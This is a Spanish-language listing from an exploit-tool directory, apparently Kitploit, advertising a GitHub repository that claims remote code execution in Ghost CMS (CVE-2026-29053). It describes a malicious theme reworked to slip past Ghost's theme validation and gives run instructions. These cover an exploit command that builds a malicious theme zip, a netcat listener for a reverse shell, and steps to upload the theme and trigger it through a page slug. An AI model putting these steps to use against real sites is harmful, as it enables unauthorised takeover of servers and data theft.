Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-29053 — Vulnerabilidad (RCE) descubierta en Ghost CMS (que afecta específicamente a las versiones 0.7.2 hasta 6.19.0) | Kitploit
Herramientas/GitHubGitHub/ac8999/cve-2026-29053
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubac8999/cve-2026-29053

CVE-2026-29053

Vulnerabilidad (RCE) descubierta en Ghost CMS (que afecta específicamente a las versiones 0.7.2 hasta 6.19.0)

Ver Repositorio
1hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Este es un rediseño del Repo de rootxran para este mismo CVE - https://github.com/rootxran/CVE-2026-29053

Durante las pruebas contra entornos específicos de Ghost CMS, el payload del tema original provocó un Error Fatal de Handlebars. El CMS no pudo activar el tema malicioso porque hacía referencia a un helper obsoleto o faltante (social_url) dentro del archivo author.hbs.

He actualizado las plantillas de Handlebars para usar helpers nativos y compatibles. Esto garantiza que el tema pase las validaciones internas de Ghost, permitiendo que el exploit se active correctamente sin ser bloqueado por el analizador de seguridad del motor de temas.

Uso: (consulte el exploit original para la guía en video).

root@kitploit:~
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip

1. nc -lvnp 4444
2. Sube el tema, crea una página con el slug 'rce'
3. Visita /rce/
Descargar herramienta